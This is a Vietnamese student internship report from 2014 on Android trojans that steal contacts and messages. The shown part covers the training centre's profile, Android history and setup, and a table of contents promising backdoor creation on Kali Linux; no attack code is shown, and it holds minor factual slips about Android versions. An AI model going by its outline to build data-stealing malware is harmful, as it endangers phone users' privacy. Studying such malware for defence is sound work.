BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
Bao cao giua ki
1. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
1
BÁO CÁO THỰC TẬP GIỮA KÌ
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ
liệu như danh sách contact, tin nhắn trên điện thoại sử
dụng Android và gửi ra ngoài
Sinh viên thực hiện :Nguyễn Hoàng Thạch
GVHD: Võ Đỗ Thắng
TP.HCM, ngày 9 tháng 8 năm 2014
2. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
2
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
TPHCM, ngày ... tháng ... năm 2014
Giáo viên hướng dẫn
3. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
3
NHẬN XÉT CỦA KHOA
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
………………………………………………………………………………………
TPHCM, ngày ... tháng ... năm 2014
Trưởng Khoa
4. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
4
Lời Nói Đầu
Hiện nay có nhiều hệ điều hành mới dành cho các thiết bị điện thoại di động, tablet để thay thế
cho những hệ điều hành cũ lõi thời. Như Apple có hệ điều hành IOS, Nokia có hệ điều hành
Window Phone, SamSung sử dụng hệ điều hành Android. Trong đó đáng kể nhất phải nói đến
Android, tuy mới bước chân vào làng điện thoại di động nhưng Android đã lần lượt hạ gục các
đối thũ tầm cỡ và trở thành hệ điều hành có tốc độ tăng trưởng cũng như chiếm thị phần lớn nhất
trên thế giới. Mỗi phiên bản của Android luôn thu hút mối quan tâm của giới công nghệ, các nhà
sản xuất và người sử dụng. Tuy vậy hệ điều hành Android cũng là hệ điều hành dễ bị các Hacker
khai thác nhất, vì vậy việc bảo đảm an toàn và hệ thống bảo mật trên Android là vấn đề đau đầu
của người dùng hiện nay. Với sự nhẹ dạ cả tin, thiếu hiểu biết của người dùng, lòng tham các
các thứ “Free” như free app, free wifi đã vô tình tiếp tay cho các Hacker xâm nhập và cài đặt mã
độc trên chính chiếc điện thoại của bạn.
Sơ đồ thể hiện sự tăng mạnh của mã độc Android
Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các trojan, malware cho phép đánh cắp dữ
liệu như danh sách contact, tin nhắn trên điện thoại Android và gửi ra ngoài” để cùng nghiên
cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng
tránh.
5. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
5
Lời Cảm Ơn
Chúng em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã tận tình giúp đỡ, hướng dẫn và
cung cấp tài liệu liên quan đến đồ án này
Xin chân thành cảm ơn Trung Tâm Athena đã tạo điều kiện thuận lợi trong học tập cũng
như trong quá trình làm đồ án thực tập này.
Chúng em cũng gửi lời cảm ơn chân thành tới các thầy cô trong Trung Tâm đã tận tình
giảng dạy, trang bị cho chúng em những kiến thức quý báu trong những tháng vừa qua.
Cảm ơn các thầy cô và bạn bè đã góp ý và giúp đỡ tận tình xây dựng đồ án này.
Xin chân thành cảm ơn!
TPHCM, ngày 9 tháng 8 năm 2014
Sinh viên thực tập
Nguyễn Hoàng Thạch
6. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
6
MỤC LỤC
PHẦN 1: GIỚI THIỆU DOANH NGHIỆP THỰC TẬP ..................................................................8
CHƯƠNG I:GIỚI THIỆU DOANH NGHIỆP THỰC TẬP – TRUNGTÂM ĐÀO TẠO QUẢN TRỊ MẠNGVÀ AN NINH MẠNG QUỐC TẾ
ATHENA.............................................................................................................................................8
1. Trụ sở và các chi nhánh:.........................................................................................................9
1.1. Trụ sở chính:...................................................................................................................9
1.2. Cơ sở 2 Tại TP Hồ Chí Minh: ...........................................................................................9
2. Quá trình hình thành và phát triển của trung tâm:.................................................................9
3. Cơ cấu tổ chức:.....................................................................................................................11
4. Các sản phẩm, giải pháp:.....................................................................................................11
4.1. Các khóa học dài hạn:...................................................................................................11
4.2. Các khóa học ngắn hạn:................................................................................................11
Khóa Quản trị mạng : ...........................................................................................................11
Khóa thiết kế web và bảo mật mạng ....................................................................................12
4.3. Các sản phẩm khác.......................................................................................................12
4.4. Cơ sở hạ tầng................................................................................................................12
4.5. Các dịch vụ hỗ trợ:........................................................................................................13
5. Khách hàng..........................................................................................................................13
6. Đối tác..................................................................................................................................13
CHƯƠNG II.CÁC NHIỆM VỤ VÀDỊCH VỤ CỦA BỘ PHẬN THỰC TẬP.....................................................................13
PHẦN 2: NỘI DUNG THỰC TẬP......................................................................................14
CHƯƠNG I:LÀM TRÊN LOCAL HOST...........................................................................................................14
1. Tổng quan về Android..........................................................................................................14
1.1 Khái niệm......................................................................................................................14
1.2 Đặc điểm......................................................................................................................14
1.3 Lịch sử phát triển..........................................................................................................15
1.4 Sự ra mắt các phiên bản Android.................................................................................17
1.5 Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lâp.................................18
1.5.1. Cài đặt Java SE trên máy tính.....................................................................................18
1.5.2. Cài đặt Eclipse và Android SDK..................................................................................23
1.5.3. Tạo máy AVD (Android Virtual Device). .....................................................................26
1.6 So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x..........................................30
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt..........................................30
1.6.2. Sự khác nhau về giao diện.........................................................................................31
1.6.3. Sự khác nhau về tính năng........................................................................................32
7. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
7
1.6.4. Sự khác nhau về giao thức mạng...............................................................................33
2. Mã độc trên Android............................................................................................................33
2.1. Định nghĩa:...................................................................................................................33
2.2. Mã độc trong môi trường Android:..............................................................................33
2.2.1. Android là một môi trường lý tưởng cho mã độc phát triển......................................33
2.2.2. Phân loại mã độc Android.........................................................................................34
2.3. Thực trạng....................................................................................................................34
2.4. Malware – tiêu biểu của trên Android..........................................................................35
2.4.1. Cơ chế hoạt động của Malware.................................................................................36
2.4.2. Mục đích của Malware DroidDream..........................................................................37
2.5. Cơ chế bảo mật trong Android.....................................................................................37
2.5.1. Tính bảo mật trong Android......................................................................................37
2.5.2. Cơ chế Permission:....................................................................................................37
2.5.3. Google Play:..............................................................................................................37
3. Cài đặt một số chương trình có mã độc trên Android...........................................................38
3.1. iCalendar ......................................................................................................................38
3.1.1. Các công cụ cần thiết:...............................................................................................38
3.1.2. Các bước thực hiện:..................................................................................................38
3.2. iMatch..........................................................................................................................45
3.2.1. Các công cụ cần thiết:...............................................................................................45
3.2.2. Các bước thực hiện:..................................................................................................45
4. Nghiên cứu Kali Linux, cách tạo mã độc trên Kali Linux để xâm nhập vào máy Android........47
4.1. Tổng quan.....................................................................................................................48
4.2. Cải tiến của Kali Linux so với Backtrack........................................................................48
4.3. Cài đặt Kali Linux...........................................................................................................49
4.3.1. Chuẩn bị....................................................................................................................49
4.3.2. Cài đặt.......................................................................................................................49
4.4. Tạo mã độc trên Kali Linux để xâm nhập Android........................................................66
4.4.1. Tạo lập Backdoor.......................................................................................................68
4.4.2. XSSF...........................................................................................................................75
CHƯƠNG II: KẾT LUẬN...........................................................................................................................82
8. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
8
Phần 1: Giới thiệudoanh nghiệp thực tập
Chương I: Giới thiệudoanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An
Ninh Mạng Quốc Tế ATHENA.
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công
ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG
TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số
4104006757 củaSở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh
nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến
trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu
chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,...
Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng,
doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân
lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo
mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất
kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ
liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự
cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm
nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ
Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các
tỉnh,…
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với
nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, HọcViệnAn Ninh Nhân Dân(
Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toànthông tin (VNISA), Viện Kỹ Thuật
Quân Sự...
9. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
9
1. Trụ sở và các chi nhánh:
1.1. Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99.
1.2. Cơ sở 2 tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.edu.vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88.
2. Quá trình hình thành và phát triểncủa trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công
nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin
nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng
với tầm nhìn xa về tương lai của ngành công nghệ thông tin , họ đã quy tụ được một lực
lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho
các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội
ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là
giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng
công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm
công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng
Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành
viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.
10. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
10
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành
một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và
đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project
2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh
viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa
đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của
đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động
cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện
tại Đà Nẵng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh tại
Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia
an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toànquốc,
đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực
công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên
của trung tâm.
Đến năm 2008:Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng
hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế
Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ
thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả
phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm
khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước.
Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung
tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới
và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đãgiúp ông Thắng vượt
qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản
trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung
tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với
sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung
cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào
tiến trình tin học hóa nước nhà.
11. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
11
3. Cơ cấu tổ chức:
Hình 1. Sơ đồ tổ chức công ty.
4. Các sản phẩm, giải pháp:
4.1. Các khóa học dài hạn:
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security
specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork securityTechnician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.
4.2. Các khóa học ngắn hạn:
Khóa Quản trị mạng :
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
12. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
12
- Quản trị mạng Microsoft nâng cao MCSE
- Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
4.3. Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
4.4. Cơ sở hạ tầng
- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ
mới nhất.
- Phòng máy rộng rãi, thoáng mát.
13. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
13
4.5. Các dịch vụ hỗ trợ:
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
- Giới thiệu việc làm cho mọi học viên
- Thực tập có lương cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời
gian
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng
máy tính, bảo mật mạng
Hỗ trợ thi Chứng chỉ Quốc tế.
5. Khách hàng
- Mọi đối tượng chuyên hoặc không chuyên về CNTT.
- Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công
nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
6. Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự
CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn
vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...
Chương II.Các nhiệm vụ và dịch vụ của bộ phận thực tập
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
Triển khai lắp đặt hệ thống mạng.
Bảo trì hệ thống mạng.
Tư vấn hỗ trợ quản trị hệ thống mạng.
14. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
14
Phần 2: Nội dung thực tập
Chương I: Làm trên local host
1. Tổng quan về Android
1.1Khái niệm.
Android là một hệ điều hành mã nguồn mở xây dựng trên nền tảng Linux, chủ yếu sử dụng
trên các thiết bị thông minh như điện thoại di động, máy tính bảng (và hiện nay là cả các đầu
phát HD, smart TV …). Trước đây, Android được phát triển bởi công ty liên hợp Android sau
đó được Google mua lại vào năm 2005. Theo ComScore, đến đầu tháng 3 năm 2014, Android
chiếm 51.7% thị phần hệ điều hành trên smartphone tại Mỹ (iOS chiếm 41.6%), là hệ điều hành
số một trên điện thoại thông minh.
Hình 1:Logo Android
Android ra mắt vào năm 2007 cùng với sự tuyên bố thành lập Liên minh thiết bị cầm tay
mở gồm 78 công ty phần cứng, phần mềm và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn
mở cho các thiết bị di động. Hệ điều hành Android bao gồm 12 triệu dòng mã: 3 triệu dòng
XML, 2.8 triều dòng mã C, 1.75 triệu dòng mã C++ và 2.1 triệu dòng mã Java. Thể hiện tính mở
của Android, Google công bố hầu hết các mã nguôn của Android theo bản cấp phép Apache.
1.2Đặc điểm.
Tính mở: Ngay từ ban đầu, Android ra mắt là một hệ điều hành mã nguôn mở, được xây
dựng trên nhân Linux mở sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với
môi trường di động; nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Tính
mở hoàn toàn của Android cho phép người phát triển tạo các ứng dụng hấp dẫn với đầy đủ các
15. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
15
điểm mạnh của các thiết bị cầm tay hiện có. Hơn nữa, một ứng dụng trong Android có thể gọi
tới bất kỳ một chức năng lõi nào như tạo cuộc gọi, gửi tinh nhắn hay sử dụng máy ảnh… cho
phép người phát triển tạo phần mềm phong phú hơn, dễ dàng liên kết các tính năng cho người
dùng. Những nền tảng ưu điểm này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các
ứng di động hoàn hảo.
Tính ngang bằng của ứng dụng: Với Android, không có sự khác nhau giữa các ứng dụng
điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới
một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng
Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn
hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn
điện thoại chỉ xem những ảnh mình thích.
Phá vỡ rào cản phát triển ứng dụng: Android phá vỡ rào cản để tạo ứng dụng mới và cải
tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá
nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho
người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người
dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập
trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.
Xây dựng ứng dụng dễ dàng và nhanh chóng: Android cung cấp bộ thư viện giao diện lập
trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho
phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để
có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một
bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
1.3Lịch sử phát triển
Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm
2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty
Viễn thông Wildfire) Nick Sears (từng là Phó giám đốc T-Mobile),và Chris White (trưởng thiết
kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh
hơn có thể biết được vị trí và sở thích của người dùng".DÙ những người thành lập và nhân viên
đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ
rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh
phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng
từ chối tham gia vào công ty.
16. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
16
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ
phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin,
Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không
có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia
thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát
triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này
cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển
chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối
tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.
Ngày 5 tháng 11 năm 2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp
hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn
Broadcom, Google, HTC, Intel,LG, Tập đoàn Marvell
Technology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-
Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng
ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng
thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6.Chiếc điện thoại chạy Android
đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu trưng của hệ
điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại
California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung
các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt
tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng, ví dụ như phiên bản
1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản Donut (bánh vòng). Phiên bản
mới nhất là 4.2 Jelly Bean (kẹo dẻo).
17. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
17
Hình 2: Các phiên bản Android
Vào năm 2010, Google ra mắt loạt thiết bị Nexus, một dòng sản phẩm bao gồm điện thoại thông
minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã
hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó
nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính
bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng
Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần
mềm mới nhất của Android.
1.4Sự ra mắt các phiên bản Android
Android alpha: là phiên bản nội bộ trong Google và OHA được nghiên cứu và phát triển
trước khi Android beta ra mắt, với các phiên bản khác nhau là "Astro Boy", "Bender" và "R2-
D2".
Android beta: được phát hành vào ngày 5 tháng 7 năm 2007. Tiếp theo đó bộ phát triển
phần mềm (SDK) ra mắt ngày 12 tháng 11 năm 2007.
Android 1.0 (API mức độ 1): Kỉ nguyên Android chính thức khởi động vào ngày 22
tháng 10 năm 2008, khi mà chiếc điện thoại T-Mobile G1 chính thức được bán ra ở Mỹ. Đến
ngày 23 tháng 9 năm 2008, Google chính thức bán ra phiên bản thương mại của phần mềm.
18. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
18
Android 1.1 (API mức độ 2): phát hành ngày 9 tháng 2 năm 2009. Đây là bản cập nhật
đầu tiên giúp giải quyết lỗi, thay đổi Android API và thêm vào một số tính năng.
Android 1.5 (API mức độ 3, phát hành ngày 27 tháng 4 năm 2009) và Android 1.6 (API
mức độ 4, phát hành ngày 15 tháng 9 năm 2009): Bản cập nhật bao gồm một số tính năng mới
và sử đổi giao diện người dùng UI.
Android 2.x (2.0-2.1 API mức độ 7, 2.2 API mức độ 8, 2.3-2.3.2 API mức độ 9, 2.3.3-
2.3.7 API mức độ 10): phát hành từ tháng 10 năm 2009 đến tháng 2 năm 2011 với nhiều tính
năng mới được thêm vào, thay đổi giao diện người dùng cũng như nâng cao khả năng bảo mật.
Android 3.x (3.1 API mức độ 12, 3.2 API mức độ 13) phát hành từ tháng 5 đến tháng 7
năm 2011 với tên gọi Honeycomb là phiên bản dành riêng cho máy tính bảng. Mặc dù không để
lại nhiều dấu ấn đắc biệt trên thị trường nhưng phiên bản này là nền tảng cho Android 4.0.
Android 4.x (từ API mức độ 15 đến API mức độ 19) phát hành từ tháng 12 năm 2011 và
tiếp tục đến nay. Được xem là sự thay đổi lớn trong lịch sử phát triển của Android với nhiều cải
tiến về mặt công nghệ cung như tính năng. Đặc biệt phiên bản này là sự hợp nhất cho hệ điều
hành smartphone và máy tính bảng.
Android 5 (API mức độ 20): phát hành tháng 7 năm 2014 là phiên bản cho nhà phát triển.
Theo dữ liệucập nhật mới nhất mà Google cung cấp về thị phần các phiên bản Android tại
link: http://developer.android.com/about/dashboards/index.html.Đến ngày 7/7/2014 thị phần
của các phiên bản Android 2.3.x và 4.x.x chiếm tỉ lệ lớn nhất thể hiện sự quan trọng và thông
dụng nhất của các phiên bản Android này.Trong đó, Android 2.3.x chiếm 13.5% còn
Android 4.x.x chiếm 85.8 %
1.5Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giảlâp.
1.5.1. Cài đặt Java SE trên máy tính.
Để cài đặt Android trênmôi trường giả lập trước tiêncần cài đặt môi trường Java For
Developers để chạy được Eclipse và Android SDK. Ở đâymình sử dụng hệ điều hành Windows 8
